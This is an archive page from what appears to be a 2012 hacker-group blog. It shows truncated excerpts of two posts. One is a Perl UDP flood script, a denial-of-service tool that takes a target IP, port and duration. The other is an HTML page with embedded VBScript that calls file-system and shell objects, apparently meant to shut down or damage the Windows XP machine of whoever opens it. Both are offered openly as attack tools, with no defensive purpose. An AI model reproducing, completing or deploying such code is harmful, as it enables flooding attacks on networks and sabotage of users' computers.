-
Recent Posts
../4rchives
../C4tegories
../Cr3w`s
../L1nk5




Monthly Archives: February 2012
Bluephantom UDP fl00d
#!/usr/bin/perl ##################################################### # BluePhantom # UDP Flood ##################################################### use strict; use warnings; use Socket; $ARGC=@ARGV; if ($ARGC !=3) { printf “$0 <ip> <port> <time>\n”; printf “if arg1/2 =0, randports/continous packets.\n”; exit(1); } my ($ip,$port,$size,$time); $ip=$ARGV[0]; $port=$ARGV[1]; $time=$ARGV[2]; socket(crazy, PF_INET, SOCK_DGRAM, … Continue reading
Posted in Security Online
Leave a comment
index.htm @uto Shuhtdown For XP
Create New file and then paste this Script into your file, save as index.htm. <html><!–Bluephantom–> <head> <title> Fuck Your OS Windows XP </title> </head> <body> <script language=”VBScript”> rem VBS On Error Resume Next Dim fso, shell, wrte, tempdir, windir, rand, … Continue reading
Posted in Security Online
Leave a comment